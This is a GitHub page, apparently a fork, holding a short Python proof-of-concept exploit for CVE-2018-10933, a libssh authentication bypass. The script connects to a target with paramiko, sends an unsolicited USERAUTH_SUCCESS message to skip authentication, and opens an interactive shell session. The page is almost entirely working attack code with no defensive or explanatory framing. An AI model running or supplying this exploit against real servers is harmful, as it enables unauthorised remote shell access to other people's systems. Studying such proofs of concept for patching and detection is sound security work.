forked from SoledaD208/CVE-2018-10933
-
Notifications
You must be signed in to change notification settings - Fork 0
/
CVE-2018-10933.py
45 lines (31 loc) · 1.14 KB
/
CVE-2018-10933.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
#!/usr/bin/env python
# coding: utf-8
import sys
import socket
import argparse
import paramiko
from paramiko.ssh_exception import SSHException
def main(hostname="127.0.0.1", port=22):
try:
sock = socket.create_connection((hostname, port))
except socket.error as e:
print('[-] Connecting to host failed. Please check the specified host and port')
return 1
# instantiate transport
m = paramiko.message.Message()
transport = paramiko.transport.Transport(sock)
try:
transport.start_client()
m.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
transport._send_message(m)
cmd_channel = transport.open_session()
cmd_channel.invoke_shell()
except SSHException as e:
print(f'SSH Exception: {e}', file=sys.stdout)
return 1
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="libssh Authentication Bypass (CVE-2018-10933)")
parser.add_argument('hostname', help='target', type=str)
parser.add_argument('-p', '--port', help='ssh port (default: 22)', default=22, type=int)
args = parser.parse_args()
main(**vars(args))